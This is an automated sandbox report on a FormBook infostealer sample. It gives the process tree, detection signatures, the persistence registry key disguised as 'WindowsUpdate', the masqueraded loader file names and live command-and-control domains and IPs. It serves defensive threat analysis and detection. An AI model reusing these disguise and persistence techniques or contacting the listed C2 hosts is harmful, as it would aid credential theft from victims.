Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
u549ed5dEA.exe

Overview

General Information

Sample name:u549ed5dEA.exe
renamed because original name is a hash value
Original sample name:f3c0f469753fe8f40c2f45cee815d8afb9fa2b54f2b6a32a14bf3dd1db56f3b7.exe
Analysis ID:1586017
MD5:9c520c748bec9e504a1911bb4d975732
SHA1:1931d33ef9ea91279c3ad469e97c04e1e8cbd93a
SHA256:f3c0f469753fe8f40c2f45cee815d8afb9fa2b54f2b6a32a14bf3dd1db56f3b7
Tags:exeuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM autoit script
Yara detected Autoit Injector
Yara detected FormBook
AI detected suspicious sample
Allocates memory in foreign processes
Found API chain indicative of sandbox detection
Injects a PE file into a foreign processes
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses ipconfig to lookup or modify the Windows network settings
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query the security center for anti-virus and firewall products
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
OS version to string mapping found (often used in BOTs)
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Use NTFS Short Name in Command Line
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • u549ed5dEA.exe (PID: 3148 cmdline: "C:\Users\user\Desktop\u549ed5dEA.exe" MD5: 9C520C748BEC9E504A1911BB4D975732)
    • wscript.exe (PID: 3128 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\itdo.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 5808 cmdline: "C:\Windows\System32\cmd.exe" /c ipconfig /release MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 1788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • ipconfig.exe (PID: 6304 cmdline: ipconfig /release MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB)
      • cmd.exe (PID: 6196 cmdline: "C:\Windows\System32\cmd.exe" /c avqj.mp2 awggmrd.xls MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • avqj.mp2 (PID: 2828 cmdline: avqj.mp2 awggmrd.xls MD5: 0ADB9B817F1DF7807576C2D7068DD931)
          • RegSvcs.exe (PID: 616 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
          • RegSvcs.exe (PID: 4796 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • cmd.exe (PID: 4324 cmdline: "C:\Windows\System32\cmd.exe" /c ipconfig /renew MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 3652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • ipconfig.exe (PID: 5276 cmdline: ipconfig /renew MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB)
  • avqj.mp2.exe (PID: 6848 cmdline: "C:\Users\user\ruum\AVQJMP~1.EXE" C:\Users\user\ruum\awggmrd.xls MD5: 0ADB9B817F1DF7807576C2D7068DD931)
    • RegSvcs.exe (PID: 6776 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • RegSvcs.exe (PID: 6496 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • avqj.mp2.exe (PID: 4676 cmdline: "C:\Users\user\ruum\AVQJMP~1.EXE" C:\Users\user\ruum\awggmrd.xls MD5: 0ADB9B817F1DF7807576C2D7068DD931)
    • RegSvcs.exe (PID: 6412 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • RegSvcs.exe (PID: 5020 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • avqj.mp2.exe (PID: 3836 cmdline: "C:\Users\user\ruum\AVQJMP~1.EXE" C:\Users\user\ruum\awggmrd.xls MD5: 0ADB9B817F1DF7807576C2D7068DD931)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000E.00000002.3279175096.0000000001310000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    0000000E.00000002.3278817499.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000000E.00000002.3279610092.00000000022E0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Process Memory Space: avqj.mp2 PID: 2828JoeSecurity_AntiVM_1Yara detected AntiVM autoit scriptJoe Security
          Process Memory Space: avqj.mp2 PID: 2828JoeSecurity_AutoitInjectorYara detected Autoit InjectorJoe Security
            Click to see the 5 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            14.2.RegSvcs.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              14.2.RegSvcs.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Invoke-Obfuscation CLIP+ Launcher
                Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /c ipconfig /release , CommandLine: "C:\Windows\System32\cmd.exe" /c ipconfig /release , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\itdo.vbe" , ParentImage: C:\Windows\SysWOW64\wscript.exe, ParentProcessId: 3128, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c ipconfig /release , ProcessId: 5808, ProcessName: cmd.exe
                Sigma detected: Invoke-Obfuscation VAR+ Launcher
                Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /c ipconfig /release , CommandLine: "C:\Windows\System32\cmd.exe" /c ipconfig /release , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\itdo.vbe" , ParentImage: C:\Windows\SysWOW64\wscript.exe, ParentProcessId: 3128, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c ipconfig /release , ProcessId: 5808, ProcessName: cmd.exe
                Sigma detected: Script Interpreter Execution From Suspicious Folder
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\itdo.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\itdo.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\u549ed5dEA.exe", ParentImage: C:\Users\user\Desktop\u549ed5dEA.exe, ParentProcessId: 3148, ParentProcessName: u549ed5dEA.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\itdo.vbe" , ProcessId: 3128, ProcessName: wscript.exe
                Sigma detected: Suspicious Script Execution From Temp Folder
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\itdo.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\itdo.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\u549ed5dEA.exe", ParentImage: C:\Users\user\Desktop\u549ed5dEA.exe, ParentProcessId: 3148, ParentProcessName: u549ed5dEA.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\itdo.vbe" , ProcessId: 3128, ProcessName: wscript.exe
                Sigma detected: WScript or CScript Dropper
                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\itdo.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\itdo.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\u549ed5dEA.exe", ParentImage: C:\Users\user\Desktop\u549ed5dEA.exe, ParentProcessId: 3148, ParentProcessName: u549ed5dEA.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\itdo.vbe" , ProcessId: 3128, ProcessName: wscript.exe
                Sigma detected: CurrentVersion Autorun Keys Modification
                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\ruum\AVQJMP~1.EXE C:\Users\user\ruum\awggmrd.xls, EventID: 13, EventType: SetValue, Image: C:\Users\user\ruum\avqj.mp2.exe, ProcessId: 6848, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate
                Sigma detected: Execution of Suspicious File Type Extension
                Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: avqj.mp2 awggmrd.xls, CommandLine: avqj.mp2 awggmrd.xls, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2, NewProcessName: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2, OriginalFileName: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c avqj.mp2 awggmrd.xls, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6196, ParentProcessName: cmd.exe, ProcessCommandLine: avqj.mp2 awggmrd.xls, ProcessId: 2828, ProcessName: avqj.mp2
                Sigma detected: Use NTFS Short Name in Command Line
                Source: Process startedAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Users\user\ruum\AVQJMP~1.EXE" C:\Users\user\ruum\awggmrd.xls, CommandLine: "C:\Users\user\ruum\AVQJMP~1.EXE" C:\Users\user\ruum\awggmrd.xls, CommandLine|base64offset|contains: , Image: C:\Users\user\ruum\avqj.mp2.exe, NewProcessName: C:\Users\user\ruum\avqj.mp2.exe, OriginalFileName: C:\Users\user\ruum\avqj.mp2.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Users\user\ruum\AVQJMP~1.EXE" C:\Users\user\ruum\awggmrd.xls, ProcessId: 6848, ProcessName: avqj.mp2.exe
                Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\itdo.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\itdo.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\u549ed5dEA.exe", ParentImage: C:\Users\user\Desktop\u549ed5dEA.exe, ParentProcessId: 3148, ParentProcessName: u549ed5dEA.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\itdo.vbe" , ProcessId: 3128, ProcessName: wscript.exe
                Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\ruum\AVQJMP~1.EXE C:\Users\user\ruum\awggmrd.xls, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2, ProcessId: 2828, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-08T16:21:22.629497+010028554651A Network Trojan was detected192.168.2.549977188.114.96.380TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-08T16:21:39.804507+010028554641A Network Trojan was detected192.168.2.549978206.238.89.11980TCP
                2025-01-08T16:21:42.398283+010028554641A Network Trojan was detected192.168.2.549979206.238.89.11980TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Multi AV Scanner detection for submitted file
                Source: u549ed5dEA.exeReversingLabs: Detection: 60%
                Yara detected FormBook
                Source: Yara matchFile source: 14.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000E.00000002.3279175096.0000000001310000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.3278817499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.3279610092.00000000022E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                Source: u549ed5dEA.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: u549ed5dEA.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: u549ed5dEA.exe
                Source: Binary string: UserAccountControlSettings.pdbGCTL source: RegSvcs.exe, 0000000E.00000002.3279041422.0000000000F98000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: UserAccountControlSettings.pdb source: RegSvcs.exe, 0000000E.00000002.3279041422.0000000000F98000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 0000000E.00000002.3279217557.00000000013F0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 0000000E.00000002.3279217557.00000000013F0000.00000040.00001000.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\u549ed5dEA.exeCode function: 0_2_00C9F826 __EH_prolog3_GS,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00C9F826
                Source: C:\Users\user\Desktop\u549ed5dEA.exeCode function: 0_2_00CB1630 __EH_prolog3_GS,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,0_2_00CB1630
                Source: C:\Users\user\Desktop\u549ed5dEA.exeCode function: 0_2_00CC1FF8 FindFirstFileExA,0_2_00CC1FF8
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_2_00EEE387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,8_2_00EEE387
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_2_00EED836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,8_2_00EED836
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_2_00EEDB69 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,8_2_00EEDB69
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_2_00EF9F9F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,8_2_00EF9F9F
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_2_00EFA0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,8_2_00EFA0FA
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_2_00EFA488 FindFirstFileW,Sleep,FindNextFileW,FindClose,8_2_00EFA488
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_2_00EF65F1 FindFirstFileW,FindNextFileW,FindClose,8_2_00EF65F1
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_2_00EBC642 FindFirstFileExW,8_2_00EBC642
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_2_00EF72E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,8_2_00EF72E9
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_2_00EF7248 FindFirstFileW,FindClose,8_2_00EF7248
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_2_00EF7247 FindFirstFileW,8_2_00EF7247

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49977 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49979 -> 206.238.89.119:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49978 -> 206.238.89.119:80
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2Code function: 8_2_00EFD7A1 InternetReadFile,SetEvent,GetLastError,SetEvent,8_2_00EFD7A1
                Source: global trafficDNS traffic detected: DNS query: www.supernutra01.online
                Source: global trafficDNS traffic detected: DNS query: www.127358.win
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007090000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2219128308.0000000001226000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 0000000F.00000003.2409654541.0000000001236000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe.8.dr, avqj.mp2.exe.exe.15.dr, avqj.mp2.exe0.8.dr, avqj.mp2.8.dr, avqj.mp2.0.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007090000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2219128308.0000000001226000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 0000000F.00000003.2409654541.0000000001236000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe.8.dr, avqj.mp2.exe.exe.15.dr, avqj.mp2.exe0.8.dr, avqj.mp2.8.dr, avqj.mp2.0.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007090000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2219128308.0000000001226000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 0000000F.00000003.2409654541.0000000001236000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe.8.dr, avqj.mp2.exe.exe.15.dr, avqj.mp2.exe0.8.dr, avqj.mp2.8.dr, avqj.mp2.0.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007090000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2219128308.0000000001226000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 0000000F.00000003.2409654541.0000000001236000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe.8.dr, avqj.mp2.exe.exe.15.dr, avqj.mp2.exe0.8.dr, avqj.mp2.8.dr, avqj.mp2.0.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007090000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2219128308.0000000001226000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 0000000F.00000003.2409654541.0000000001236000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe.8.dr, avqj.mp2.exe.exe.15.dr, avqj.mp2.exe0.8.dr, avqj.mp2.8.dr, avqj.mp2.0.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007090000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2219128308.0000000001226000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 0000000F.00000003.2409654541.0000000001236000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe.8.dr, avqj.mp2.exe.exe.15.dr, avqj.mp2.exe0.8.dr, avqj.mp2.8.dr, avqj.mp2.0.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007090000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2219128308.0000000001226000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 0000000F.00000003.2409654541.0000000001236000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe.8.dr, avqj.mp2.exe.exe.15.dr, avqj.mp2.exe0.8.dr, avqj.mp2.8.dr, avqj.mp2.0.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007090000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2219128308.0000000001226000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 0000000F.00000003.2409654541.0000000001236000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe.8.dr, avqj.mp2.exe.exe.15.dr, avqj.mp2.exe0.8.dr, avqj.mp2.8.dr, avqj.mp2.0.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007090000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2219128308.0000000001226000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 0000000F.00000003.2409654541.0000000001236000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe.8.dr, avqj.mp2.exe.exe.15.dr, avqj.mp2.exe0.8.dr, avqj.mp2.8.dr, avqj.mp2.0.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007090000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2219128308.0000000001226000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 0000000F.00000003.2409654541.0000000001236000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe.8.dr, avqj.mp2.exe.exe.15.dr, avqj.mp2.exe0.8.dr, avqj.mp2.8.dr, avqj.mp2.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007090000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2219128308.0000000001226000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 0000000F.00000003.2409654541.0000000001236000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe.8.dr, avqj.mp2.exe.exe.15.dr, avqj.mp2.exe0.8.dr, avqj.mp2.8.dr, avqj.mp2.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007090000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000000.2196955869.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp, avqj.mp2, 00000008.00000003.2219128308.0000000001226000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 0000000F.00000002.2586770726.00000000007F5000.00000002.00000001.01000000.0000000C.sdmp, avqj.mp2.exe, 0000000F.00000003.2409654541.0000000001236000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000013.00000002.3151702741.00000000007F5000.00000002.00000001.01000000.0000000C.sdmp, avqj.mp2.exe, 00000014.00000000.2644570578.00000000007F5000.00000002.00000001.01000000.0000000C.sdmp, avqj.mp2.exe.8.dr, avqj.mp2.exe.exe.15.dr, avqj.mp2.exe0.8.dr, avqj.mp2.8.dr, avqj.mp2.0.drString found in binary or memory: http://www.autoitscript.com/autoit3/J
